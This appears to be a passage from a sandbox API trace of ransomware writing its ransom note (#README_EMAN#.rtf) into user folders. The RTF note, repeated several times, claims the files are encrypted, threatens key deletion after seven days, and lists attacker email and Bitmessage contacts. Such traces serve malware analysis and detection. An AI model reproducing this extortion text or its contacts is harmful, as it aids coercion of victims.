\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.685] WriteFile (in: hFile=0x2cc, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.686] CloseHandle (hObject=0x2cc) returned 1 [0289.686] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\#readme_eman#.rtf")) returned 0xffffffff [0289.686] GetLastError () returned 0x2 [0289.686] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to 